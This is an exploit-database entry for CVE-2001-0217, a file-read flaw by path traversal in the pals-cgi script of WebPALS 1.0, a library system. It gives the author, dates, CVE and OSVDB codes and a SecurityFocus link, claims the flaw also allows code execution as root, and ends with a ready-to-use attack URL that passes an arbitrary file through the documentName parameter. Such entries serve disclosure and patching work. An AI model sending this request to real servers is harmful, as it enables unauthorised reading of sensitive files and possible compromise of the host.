PALS Library System WebPALS 1.0 - pals-cgi Traversal Arbitrary File Read
Author: cuctema
type: remote
platform: cgi
port:
date_added: 2001-02-02
date_updated: 2012-08-18
verified: 1
codes: CVE-2001-0217;OSVDB-507
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/2372/info
A specially crafted URL composed of a known filename, will disclose the requested file residing on a machine running WebPALS. This vulnerability will also allow an attacker to execute arbitrary code with root privileges.
http://target/cgi-bin/pals-cgi?palsAction=restart&documentName=url_to_file